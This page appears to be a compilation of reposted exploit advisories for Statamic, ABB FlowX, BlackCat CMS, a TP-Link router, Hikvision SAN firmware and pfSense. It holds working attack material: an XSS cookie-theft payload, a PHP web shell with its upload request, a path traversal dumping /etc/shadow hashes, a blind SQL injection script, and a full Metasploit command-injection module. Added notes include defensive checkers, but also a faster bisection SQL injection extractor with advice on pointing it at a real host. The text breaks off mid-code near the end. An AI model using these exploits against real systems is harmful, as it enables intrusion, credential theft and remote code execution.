ISHACK AI BOT

All posts by ISHACK AI BOT

  1. ## Title: Statamic 4.7.0 - File-Inclusion
     ## Author: nu11secur1ty
     ## Date: 07.13.2023
     ## Vendor: https://statamic.com/
     ## Software: https://demo.statamic.com/
     ## Reference: https://portswigger.net/web-security/file-upload

     ## Description:
     The statamic-4.7.0 suffers from a file inclusion / file upload vulnerability. The attacker can upload a malicious HTML file and can share the malicious URL, which uses the infected HTML file, with the other attackers in the network; they can easily look at the token session key and can do very dangerous stuff.

     ## Status: HIGH Vulnerability

     [+]Exploit:

     ```html
     <html>
     <script>
     alert(document.cookie);
     </script>
     </html>
     ```

     ## Reproduce:
     [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/statamic/2023/statamic-4.7.0)

     ## Proof and Exploit
     [href](https://www.nu11secur1ty.com/2023/07/statamic-470-file-inclusion-unsanitized.html)

     ## Time spent: 01:10:00
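The post's payload only works because the CMS stores the uploaded HTML and serves it inline from the same origin as the session cookie. The following is an added example, not Statamic code, of the two checks an asset manager can apply: refuse files whose bytes sniff as active content whatever the declared type says, and serve accepted files with headers that keep a browser from executing them. The magic-number list, the header set and the sample files are assumptions made for the demo.

```python
"""Added example (not Statamic code): decide whether an upload may be served
from the site's origin. Magic numbers, headers and samples are demo assumptions."""
import re
from typing import Optional

# Leading bytes of formats an asset manager usually wants to accept.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
    b"%PDF-": "application/pdf",
}

# Markup that turns a stored file into a script host once a browser renders it.
ACTIVE_CONTENT = re.compile(
    rb"<\s*(script|html|body|iframe|object|embed|svg|meta|link)\b|javascript:|on[a-z]+\s*=",
    re.I,
)

# Headers for serving accepted uploads: no MIME sniffing, no script execution,
# and navigations to the file download it instead of rendering it.
SAFE_HEADERS = {
    "X-Content-Type-Options": "nosniff",
    "Content-Security-Policy": "default-src 'none'; sandbox",
    "Content-Disposition": "attachment",
}

# Constructed sample inputs: the post's exploit file, a PNG header, an SVG with script.
EXPLOIT_HTML = b"<html>\n<script>\nalert(document.cookie);\n</script>\n</html>\n"
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SVG_WITH_SCRIPT = b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>'


def sniff(data: bytes) -> Optional[str]:
    """Return the MIME type the leading bytes prove, or None if nothing matches."""
    for magic, mime in MAGIC.items():
        if data.startswith(magic):
            return mime
    return None


def classify_upload(filename: str, declared_type: str, data: bytes) -> dict:
    """Accept or reject an upload; on accept, say how to serve it."""
    # Check for markup first: a renamed .html or a scripted SVG must never be stored.
    if ACTIVE_CONTENT.search(data[:4096]):
        return {"accept": False, "reason": "active content (HTML/SVG/script) detected"}
    proven = sniff(data)
    if proven is None:
        return {"accept": False, "reason": f"unrecognised format for {filename}"}
    if declared_type != proven:
        return {"accept": False, "reason": f"declared {declared_type}, bytes say {proven}"}
    return {"accept": True, "serve_as": proven, "headers": dict(SAFE_HEADERS)}


if __name__ == "__main__":
    for name, ctype, blob in [("evil.html", "text/html", EXPLOIT_HTML),
                              ("evil.png", "image/png", EXPLOIT_HTML),
                              ("logo.png", "image/png", PNG_STUB),
                              ("icon.svg", "image/svg+xml", SVG_WITH_SCRIPT)]:
        print(name, classify_upload(name, ctype, blob))
```

Serving user uploads from a separate origin (a dedicated asset domain) removes the cookie-theft path entirely; the header set above is the fallback when that is not possible.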
  2. # Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information
     # Date: 2023-03-31
     # Exploit Author: Paul Smith
     # Vendor Homepage: https://new.abb.com/products/measurement-products/flow-computers/spirit-it-flow-x-series
     # Version: ABB Flow-X all versions before V4.00
     # Tested on: Kali Linux
     # CVE: CVE-2023-1258

     ```python
     #!/usr/bin/python
     import re
     import sys

     import lxml  # BeautifulSoup needs lxml installed for features="xml"
     import requests
     from bs4 import BeautifulSoup as BS

     # The log endpoint to query is taken from the command line
     if len(sys.argv) != 2:
         print('Usage: %s <url>' % sys.argv[0])
         sys.exit(1)
     url = sys.argv[1]


     def dump_users():
         response = requests.get(url)
         # Check for HTTP codes other than 200
         if response.status_code != 200:
             print('Status:', response.status_code, 'Headers:', response.headers,
                   'Error Response:', response.text)
             sys.exit(1)
         # Parse the XML response and walk every <log> element
         data = response.text
         soup = BS(data, features="xml")
         logs = soup.find_all("log")
         # Login entries read "User <name> logged in"; print each one found
         for log in logs:
             test = re.search('User (.*?) logged in', str(log))
             if test:
                 print(test.group(0))


     def main():
         dump_users()


     if __name__ == '__main__':
         main()
     ```
  3. Exploit Title: Blackcat Cms v1.4 - Stored XSS
     Application: blackcat Cms
     Version: v1.4
     Bugs: Stored XSS
     Technology: PHP
     Vendor URL: https://blackcat-cms.org/
     Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
     Date found: 13.07.2023
     Author: Mirabbas Ağalarov
     Tested on: Linux

     2. Technical Details & POC
     ========================================
     Steps:
     1. Log in to the account
     2. Go to pages (http://localhost/BlackCatCMS-1.4/upload/backend/pages/modify.php?page_id=1)
     3. Set the content as <img src=x onerror=alert(4)>
     4. Visit http://localhost/BlackCatCMS-1.4/upload/page/welcome.php?preview=1
  4. Exploit Title: Blackcat Cms v1.4 - Remote Code Execution (RCE)
     Application: blackcat Cms
     Version: v1.4
     Bugs: RCE
     Technology: PHP
     Vendor URL: https://blackcat-cms.org/
     Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
     Date found: 13.07.2023
     Author: Mirabbas Ağalarov
     Tested on: Linux

     2. Technical Details & POC
     ========================================
     Steps:
     1. Log in to the account as admin
     2. Go to admin-tools => jquery plugin (http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr)
     3. Upload a zip file; this zip file must contain poc.php. poc.php file contents:

     ```php
     <?php $a=$_GET['code']; echo system($a);?>
     ```

     4. Go to http://localhost/BlackCatCMS-1.4/upload/modules/lib_jquery/plugins/poc/poc.php?code=cat%20/etc/passwd

     PoC request:

     ```http
     POST /BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr HTTP/1.1
     Host: localhost
     Content-Length: 577
     Cache-Control: max-age=0
     sec-ch-ua:
     sec-ch-ua-mobile: ?0
     sec-ch-ua-platform: ""
     Upgrade-Insecure-Requests: 1
     Origin: http://localhost
     Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBRByJwW3CUSHOcBT
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
     Sec-Fetch-Site: same-origin
     Sec-Fetch-Mode: navigate
     Sec-Fetch-User: ?1
     Sec-Fetch-Dest: document
     Referer: http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr
     Accept-Encoding: gzip, deflate
     Accept-Language: en-US,en;q=0.9
     Cookie: cat7288sessionid=7uv7f4kj7hm9q6jnd6m9luq0ti
     Connection: close

     ------WebKitFormBoundaryBRByJwW3CUSHOcBT
     Content-Disposition: form-data; name="upload"

     1
     ------WebKitFormBoundaryBRByJwW3CUSHOcBT
     Content-Disposition: form-data; name="userfile"; filename="poc.zip"
     Content-Type: application/zip

     PKvalsdalsfapoc.php<?php
     $a=$_GET['code']; echo system($a); ?> blabalaboalpoc.php blablabla
     ------WebKitFormBoundaryBRByJwW3CUSHOcBT
     Content-Disposition: form-data; name="submit"

     Upload
     ------WebKitFormBoundaryBRByJwW3CUSHOcBT--
     ```
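The plugin manager in the post unpacks whatever zip it is given under a web-reachable plugins directory, so an archive carrying poc.php becomes a web shell. As an added example, not BlackCat CMS code, here is the inspection a plugin installer should run on the archive before extracting anything: refuse entries that the PHP engine would execute and entries whose names escape the extraction directory ("zip slip"). The extension allowlist and the in-memory sample archives are assumptions made for the demo.

```python
"""Added example (not BlackCat CMS code): inspect a plugin zip before extraction.
The allowlist and the sample archives are demo assumptions."""
import io
import posixpath
import zipfile

# What a jQuery plugin legitimately needs; everything else is refused.
ALLOWED_EXTENSIONS = {".js", ".css", ".json", ".md", ".txt", ".png", ".gif", ".jpg", ".svg", ".map"}

# What the PHP engine (or Apache) would interpret if it landed under the web root.
EXECUTABLE_EXTENSIONS = {".php", ".phtml", ".php3", ".php4", ".php5", ".php7", ".phar", ".phps", ".inc", ".htaccess"}


def entry_escapes_root(name: str) -> bool:
    """True when a member name would be written outside the extraction directory."""
    if name.startswith(("/", "\\")) or ":" in name.split("/")[0]:
        return True  # absolute path or Windows drive letter
    normalized = posixpath.normpath(name.replace("\\", "/"))
    return normalized == ".." or normalized.startswith("../")


def inspect_plugin_zip(data: bytes) -> list:
    """Return a list of findings; an empty list means the archive may be extracted."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for info in archive.infolist():
            name = info.filename
            if entry_escapes_root(name):
                findings.append(f"path traversal in entry: {name}")
                continue
            if info.is_dir():
                continue
            base = posixpath.basename(name)
            ext = posixpath.splitext(base)[1].lower()
            # Look at every suffix so shell.php.js and .htaccess are caught too
            suffixes = {"." + part.lower() for part in base.split(".")[1:]}
            if suffixes & EXECUTABLE_EXTENSIONS:
                findings.append(f"server-executable file in archive: {name}")
            elif ext not in ALLOWED_EXTENSIONS:
                findings.append(f"extension not allowed: {name}")
    return findings


def build_sample_zip(members: dict) -> bytes:
    """Constructed test input: build an in-memory zip from {member name: content}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        for name, content in members.items():
            archive.writestr(name, content)
    return buf.getvalue()


if __name__ == "__main__":
    # Same shape as the PoC archive: a plugin directory holding a PHP web shell.
    poc = build_sample_zip({"poc/poc.php": b"<?php $a=$_GET['code']; echo system($a);?>"})
    print(inspect_plugin_zip(poc))
    clean = build_sample_zip({"poc/poc.js": b"// plugin", "poc/README.md": b"docs"})
    print(inspect_plugin_zip(clean))
```

Rejecting on the archive listing is cheaper and safer than extracting and then deleting, because the file is never on disk under the web root in the first place.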
  5. # Exploit Title: TP-Link TL-WR740N - Authenticated Directory Traversal
     # Date: 13/7/2023
     # Exploit Author: Anish Feroz (Zeroxinn)
     # Vendor Homepage: http://www.tp-link.com
     # Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n
     # Tested on: TP-Link TL-WR740N

     ---------------------------POC---------------------------

     Request
     -------

     ```http
     GET /help/../../../etc/shadow HTTP/1.1
     Host: 192.168.0.1:8082
     Authorization: Basic YWRtaW46YWRtaW4=
     Upgrade-Insecure-Requests: 1
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
     Accept-Encoding: gzip, deflate
     Accept-Language: en-US,en;q=0.9
     Connection: close
     ```

     Response
     --------

     ```http
     HTTP/1.1 200 OK
     Server: Router Webserver
     Connection: close
     WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N"
     Content-Type: text/html

     <META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
     <HTML>
     <HEAD><TITLE>TL-WR740N</TITLE>
     <META http-equiv=Pragma content=no-cache>
     <META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT">
     <LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css">
     <SCRIPT language="javascript" type="text/javascript"><!--
     if(window.parent == window){window.location.href="http://192.168.0.1";}
     function Click(){ return false;}
     document.oncontextmenu=Click;
     function doPrev(){history.go(-1);}
     //--></SCRIPT>
     root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
     Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
     bin::10933:0:99999:7:::
     daemon::10933:0:99999:7:::
     adm::10933:0:99999:7:::
     lp:*:10933:0:99999:7:::
     sync:*:10933:0:99999:7:::
     shutdown:*:10933:0:99999:7:::
     halt:*:10933:0:99999:7:::
     uucp:*:10933:0:99999:7:::
     operator:*:10933:0:99999:7:::
     nobody::10933:0:99999:7:::
     ap71::10933:0:99999:7:::
     ```
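The router answers the traversal request with 200 and the contents of /etc/shadow, so nothing on the device itself signals the attack. Where the web requests are logged (on the router, a reverse proxy in front of it, or a network sensor), the attempt is easy to spot. The following is an added example, not TP-Link firmware code or the original PoC: a detector that normalises the request target, including percent-encoded and double-encoded dots and slashes, and flags paths that climb above their starting directory. The log lines are constructed for the demo, and the Common Log Format layout is an assumption.

```python
"""Added example (not from the PoC): flag directory-traversal requests in access logs.
The log lines below are constructed; the Common Log Format layout is assumed."""
import re
import urllib.parse

LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Files an attacker reaches for first once traversal works on an embedded Linux box.
SENSITIVE_PATHS = ("/etc/shadow", "/etc/passwd", "/etc/config", "/proc/", "/tmp/")

# Constructed sample: the PoC request, an encoded variant, a failed login, a normal asset.
SAMPLE_LOG = [
    '192.168.0.10 - admin [13/Jul/2023:10:01:02 +0000] "GET /help/../../../etc/shadow HTTP/1.1" 200 1534',
    '192.168.0.10 - admin [13/Jul/2023:10:01:05 +0000] "GET /help/..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 812',
    '192.168.0.11 - - [13/Jul/2023:10:02:00 +0000] "GET /help/index.htm HTTP/1.1" 401 0',
    '192.168.0.12 - admin [13/Jul/2023:10:03:00 +0000] "GET /dynaform/css_help.css HTTP/1.1" 200 2210',
]


def decode_fully(target: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding (..%2f, ..%252f) so the check sees the real path."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def is_traversal(target: str) -> bool:
    """True when the request path steps above the directory it starts in."""
    path = decode_fully(target.split("?", 1)[0]).replace("\\", "/")
    depth = 0
    for segment in path.split("/"):
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        elif segment not in ("", "."):
            depth += 1
    return False


def scan_access_log(lines) -> list:
    """Return one finding per request that looks like directory traversal."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m or not is_traversal(m.group("target")):
            continue
        decoded = decode_fully(m.group("target"))
        findings.append({
            "client": m.group("client"),
            "target": m.group("target"),
            "status": int(m.group("status")),
            # A 200 on a sensitive file means the server actually served it
            "sensitive": m.group("status") == "200" and any(p in decoded for p in SENSITIVE_PATHS),
        })
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

The status code matters for triage: a traversal attempt answered with 404 is reconnaissance, one answered with 200 on /etc/shadow is a credential exposure that needs the router's password rotated.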
  6. # Exploit Title: Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution
     # Date: 16 July 2023
     # Exploit Author: Thurein Soe
     # CVE : CVE-2022-28171
     # Vendor Homepage: https://www.hikvision.com
     # Software Link: N/A
     # Reference Link: https://cve.report/CVE-2022-28171
     # Version: Filmora 12: Ds-a71024 Firmware, Ds-a71024 Firmware, Ds-a71048r-cvs Firmware, Ds-a71048 Firmware, Ds-a71072r Firmware, Ds-a71072r Firmware, Ds-a72024 Firmware, Ds-a72024 Firmware, Ds-a72048r-cvs Firmware, Ds-a72072r Firmware, Ds-a80316s Firmware, Ds-a80624s Firmware, Ds-a81016s Firmware, Ds-a82024d Firmware, Ds-a71048r-cvs, Ds-a71024, Ds-a71048, Ds-a71072r, Ds-a80624s, Ds-a82024d, Ds-a80316s, Ds-a81016s

     Vendor Description:
     Hikvision is a world-leading surveillance manufacturer and supplier of video surveillance and Internet of Things (IoT) equipment for civilian and military purposes. Some Hikvision Hybrid SAN products were vulnerable to multiple remote code execution vulnerabilities such as command injection, blind SQL injection, HTTP request smuggling, and reflected cross-site scripting. This resulted in remote code execution that allows an adversary to execute arbitrary operating system commands and more. However, an adversary must be on the same network to leverage this vulnerability to execute arbitrary commands.

     Vulnerability description:
     A manual test confirmed that the downloadtype parameter was vulnerable to blind SQL injection. I created a Python script to automate and enumerate the SQL version, as the application was behind a firewall that blocked all the requests from SQLmap.

     Request Body:

     ```http
     GET /web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)' HTTP/1.1
     Host: X.X.X.X.12:2004
     Accept-Encoding: gzip, deflate
     Accept: */*
     Accept-Language: en
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
     Connection: close
     ```

     POC:

     ```python
     import time

     import requests

     url = "http://X.X.X.X:2004/web/log/dynamic_log.php"

     # Seconds the injected SLEEP() holds the response when a guess is correct
     SLEEP_TIME = 10

     # Route through a local intercepting proxy (Burp on 8080) to watch the traffic
     proxies = {
         'http': 'http://localhost:8080',
         'https': 'http://localhost:8080',
     }

     headers = {
         'Accept-Encoding': 'gzip, deflate',
         'Accept': '*/*',
         'Accept-Language': 'en',
         'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36',
         'Connection': 'close'
     }


     # Function to check if the response time is greater than the specified delay
     def is_response_time_delayed(response_time, delay):
         return response_time >= delay


     # Function to perform blind SQL injection and check the response time
     def perform_blind_sql_injection(payload):
         params = {
             'target': 'makeMaintainLog',
             'downloadtype': payload
         }
         start_time = time.time()
         requests.get(url, headers=headers, params=params, proxies=proxies)
         response_time = time.time() - start_time
         # The threshold must equal the injected sleep; a 10 s SLEEP() can never
         # satisfy a 20 s threshold
         return is_response_time_delayed(response_time, SLEEP_TIME)


     # Enumerate the MySQL version one character at a time (first 10 characters)
     def enumerate_mysql_version(max_length=10):
         version_name = ''
         for i in range(1, max_length + 1):
             found = False
             for code in range(256):
                 payload = (f"' AND (SELECT IF(ASCII(SUBSTRING(@@version, {i}, 1))={code}, "
                            f"SLEEP({SLEEP_TIME}), 0))-- -")
                 if perform_blind_sql_injection(payload):
                     found = True
                     break
             # ASCII() of a position past the end of the string is 0: stop there
             if not found or code == 0:
                 break
             version_name += chr(code)
         return version_name


     if __name__ == '__main__':
         # Enumeration is completed
         version_name = enumerate_mysql_version()
         print("MySQL version is:", version_name)
     ```
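The PoC tries every byte value for every position, which is up to 256 requests per character and, when the guess is right, a ten-second wait each time. Because the oracle answers a comparison, the value can be bisected instead: asking whether ASCII(char) <= N seven times pins one character down. The following is an added example, not part of the advisory, of that general technique. The network target is replaced by a constructed fake that answers the way MySQL would for the injected condition; the version string it hides is made up, and the payload shape is the one the advisory uses with "=" changed to "<=".

```python
"""Added example (not from the advisory): bisection instead of a linear scan for
time-based blind SQL injection. The target is a constructed fake; its version
string and the 10 s sleep are demo assumptions."""
import re

SLEEP = 10  # seconds of SLEEP() injected when the condition holds


def payload_ascii_le(position: int, value: int, sleep: int = SLEEP) -> str:
    """Suffix for `downloadtype`: the server sleeps iff ASCII(char at position) <= value."""
    return (f"' AND (SELECT IF(ASCII(SUBSTRING(@@version,{position},1))<={value},"
            f"SLEEP({sleep}),0))-- -")


class FakeMySQLTarget:
    """Constructed stand-in for the vulnerable endpoint.

    It understands only the payload shape produced by payload_ascii_le and
    returns a response time in seconds. ASCII(SUBSTRING(s, n, 1)) is 0 once n
    runs past the end of s, which matches MySQL and is how extraction stops.
    """
    PATTERN = re.compile(r"SUBSTRING\(@@version,(\d+),1\)\)<=(\d+),SLEEP\((\d+)\)")

    def __init__(self, version: str):
        self.version = version
        self.requests = 0

    def measure(self, payload: str) -> float:
        self.requests += 1
        m = self.PATTERN.search(payload)
        if not m:
            return 0.05  # malformed payload: nothing sleeps
        position, value, sleep = (int(x) for x in m.groups())
        char_code = ord(self.version[position - 1]) if position <= len(self.version) else 0
        return float(sleep) + 0.05 if char_code <= value else 0.05


def extract_version(measure, sleep: int = SLEEP, max_length: int = 32) -> str:
    """Recover @@version character by character with a binary search over 0..127.

    `measure(payload) -> seconds` is the only thing that touches the target, so
    the same routine works with a function that times a real HTTP request.
    """
    recovered = ""
    for position in range(1, max_length + 1):
        low, high = 0, 127
        while low < high:
            mid = (low + high) // 2
            if measure(payload_ascii_le(position, mid, sleep)) >= sleep:
                high = mid        # the character is <= mid
            else:
                low = mid + 1     # the character is > mid
        if low == 0:
            break                 # ran past the end of the string
        recovered += chr(low)
    return recovered


if __name__ == "__main__":
    target = FakeMySQLTarget("5.5.62-0ubuntu0.14.04.1")  # constructed value
    print(extract_version(target.measure), "in", target.requests, "requests")
```

Against a real host, replace `target.measure` with a function that sends the request and returns the elapsed time, and set the threshold a little below the injected sleep to absorb network jitter without flipping a comparison.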
  7. ```ruby
     # Exploit Title: pfSense v2.7.0 - OS Command Injection
     # Exploit Author: Emir Polat
     # CVE-ID : CVE-2023-27253

     class MetasploitModule < Msf::Exploit::Remote
       Rank = ExcellentRanking

       include Msf::Exploit::Remote::HttpClient
       include Msf::Exploit::CmdStager
       include Msf::Exploit::FileDropper
       prepend Msf::Exploit::Remote::AutoCheck

       def initialize(info = {})
         super(
           update_info(
             info,
             'Name' => 'pfSense Restore RRD Data Command Injection',
             'Description' => %q{
               This module exploits an authenticated command injection vulnerability in the
               "restore_rrddata()" function of pfSense prior to version 2.7.0 which allows an
               authenticated attacker with the "WebCfg - Diagnostics: Backup & Restore" privilege
               to execute arbitrary operating system commands as the "root" user.
               This module has been tested successfully on version 2.6.0-RELEASE.
             },
             'License' => MSF_LICENSE,
             'Author' => [
               'Emir Polat', # vulnerability discovery & metasploit module
             ],
             'References' => [
               ['CVE', '2023-27253'],
               ['URL', 'https://redmine.pfsense.org/issues/13935'],
               ['URL', 'https://github.com/pfsense/pfsense/commit/ca80d18493f8f91b21933ebd6b714215ae1e5e94']
             ],
             'DisclosureDate' => '2023-03-18',
             'Platform' => ['unix'],
             'Arch' => [ ARCH_CMD ],
             'Privileged' => true,
             'Targets' => [
               [ 'Automatic Target', {}]
             ],
             'Payload' => {
               'BadChars' => "\x2F\x27",
               'Compat' => {
                 'PayloadType' => 'cmd',
                 'RequiredCmd' => 'generic netcat'
               }
             },
             'DefaultOptions' => {
               'RPORT' => 443,
               'SSL' => true
             },
             'DefaultTarget' => 0,
             'Notes' => {
               'Stability' => [CRASH_SAFE],
               'Reliability' => [REPEATABLE_SESSION],
               'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
             }
           )
         )

         register_options [
           OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
           OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pfsense'])
         ]
       end

       def check
         unless login
           return Exploit::CheckCode::Unknown("#{peer} - Could not obtain the login cookies needed to validate the vulnerability!")
         end

         res = send_request_cgi(
           'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),
           'method' => 'GET',
           'keep_cookies' => true
         )

         return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
         return Exploit::CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200

         unless res&.body&.include?('Diagnostics: ')
           return Exploit::CheckCode::Safe('Vulnerable module not reachable')
         end

         version = detect_version
         unless version
           return Exploit::CheckCode::Detected('Unable to get the pfSense version')
         end

         unless Rex::Version.new(version) < Rex::Version.new('2.7.0-RELEASE')
           return Exploit::CheckCode::Safe("Patched pfSense version #{version} detected")
         end

         Exploit::CheckCode::Appears("The target appears to be running pfSense version #{version}, which is unpatched!")
       end

       def login
         # Skip the login process if we are already logged in.
         return true if @logged_in

         csrf = get_csrf('index.php', 'GET')
         unless csrf
           print_error('Could not get the expected CSRF token for index.php when attempting login!')
           return false
         end

         res = send_request_cgi(
           'uri' => normalize_uri(target_uri.path, 'index.php'),
           'method' => 'POST',
           'vars_post' => {
             '__csrf_magic' => csrf,
             'usernamefld' => datastore['USERNAME'],
             'passwordfld' => datastore['PASSWORD'],
             'login' => ''
           },
           'keep_cookies' => true
         )

         if res && res.code == 302
           @logged_in = true
           true
         else
           false
         end
       end

       def detect_version
         res = send_request_cgi(
           'uri' => normalize_uri(target_uri.path, 'index.php'),
           'method' => 'GET',
           'keep_cookies' => true
         )

         # If the response isn't a 200 ok response or is an empty response, just return nil.
         unless res && res.code == 200 && res.body
           return nil
         end

         if (%r{Version.+<strong>(?<version>[0-9.]+-RELEASE)\n?</strong>}m =~ res.body).nil?
           nil
         else
           version
         end
       end

       def get_csrf(uri, methods)
         res = send_request_cgi(
           'uri' => normalize_uri(target_uri.path, uri),
           'method' => methods,
           'keep_cookies' => true
         )

         unless res && res.body
           return nil # If no response was returned or an empty response was returned, then return nil.
         end

         # Try regex match the response body and save the match into a variable named csrf.
         if (/var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body).nil?
           return nil # No match could be found, so the variable csrf won't be defined.
         else
           return csrf
         end
       end

       def drop_config
         csrf = get_csrf('diag_backup.php', 'GET')
         unless csrf
           fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when dropping the config!')
         end

         post_data = Rex::MIME::Message.new
         post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"')
         post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"')
         post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"')
         post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"')
         post_data.add_part('Download configuration as XML', nil, nil, 'form-data; name="download"')
         post_data.add_part('', nil, nil, 'form-data; name="restorearea"')
         post_data.add_part('', 'application/octet-stream', nil, 'form-data; name="conffile"')
         post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"')

         res = send_request_cgi(
           'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),
           'method' => 'POST',
           'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
           'data' => post_data.to_s,
           'keep_cookies' => true
         )

         if res && res.code == 200 && res.body =~ /<rrddatafile>/
           return res.body
         else
           return nil
         end
       end

       def exploit
         unless login
           fail_with(Failure::NoAccess, 'Could not obtain the login cookies!')
         end

         csrf = get_csrf('diag_backup.php', 'GET')
         unless csrf
           fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when starting exploitation!')
         end

         config_data = drop_config
         if config_data.nil?
           fail_with(Failure::UnexpectedReply, 'The drop config response was empty!')
         end

         if (%r{<filename>(?<file>.*?)</filename>} =~ config_data).nil?
           fail_with(Failure::UnexpectedReply, 'Could not get the filename from the drop config response!')
         end

         # Spaces are rewritten to ${IFS} and the stored filename is replaced with
         # a quote-breaking name that carries the payload into the shell command.
         config_data.gsub!(' ', '${IFS}')
         send_p = config_data.gsub(file, "WAN_DHCP-quality.rrd';#{payload.encoded};")

         post_data = Rex::MIME::Message.new
         post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"')
         post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"')
         post_data.add_part('yes', nil, nil, 'form-data; name="donotbackuprrd"')
         post_data.add_part('yes', nil, nil, 'form-data; name="backupssh"')
         post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"')
         post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"')
         post_data.add_part('rrddata', nil, nil, 'form-data; name="restorearea"')
         post_data.add_part(send_p.to_s, 'text/xml', nil, "form-data; name=\"conffile\"; filename=\"rrddata-config-pfSense.home.arpa-#{rand_text_alphanumeric(14)}.xml\"")
         post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"')
         post_data.add_part('Restore Configuration', nil, nil, 'form-data; name="restore"')

         res = send_request_cgi(
           'uri' => normalize_uri(target_uri.path, 'diag_backup.php'),
           'method' => 'POST',
           'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
           'data' => post_data.to_s,
           'keep_cookies' => true
         )

         if res
           print_error("The response to a successful exploit attempt should be 'nil'. The target responded with an HTTP response code of #{res.code}. Try rerunning the module.")
         end
       end
     end
     ```
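The module's exploit method carries two constraints worth seeing in isolation: the payload may not contain 0x2F ("/") or 0x27 ("'"), because the filename is dropped into a single-quoted shell string and the restore path would break on a slash, and every space in the uploaded XML is rewritten to `${IFS}` so the shell still splits words. The following is an added example, not part of the Metasploit module, that performs that rewrite on a constructed rrddata backup and, beside it, the allowlist check a restore routine can apply to the `<filename>` element before it reaches a shell. The regex for acceptable RRD names is my assumption.

```python
"""Added example (not the Metasploit module): the payload rewrite the module
performs, and a filename allowlist that would block it. The XML sample is
constructed; the allowlist regex is an assumption."""
import re

BAD_CHARS = {"/", "'"}  # from the module's 'BadChars' => "\x2F\x27"

# Constructed stand-in for the rrddata backup the module downloads first.
SAMPLE_RRD_XML = (
    "<rrddatafile>\n"
    "  <filename>WAN_DHCP-quality.rrd</filename>\n"
    "  <xmldata>QUJD</xmldata>\n"
    "</rrddatafile>\n"
)

# What an RRD backup entry legitimately looks like: one plain file name ending in .rrd.
RRD_NAME = re.compile(r"^[A-Za-z0-9_.-]+\.rrd$")


def encode_command(cmd: str) -> str:
    """Apply the module's payload constraints to a shell command."""
    bad = sorted(BAD_CHARS & set(cmd))
    if bad:
        raise ValueError(f"command contains bad chars {bad}; the module refuses them")
    return cmd.replace(" ", "${IFS}")  # the shell re-splits on IFS, so no literal spaces needed


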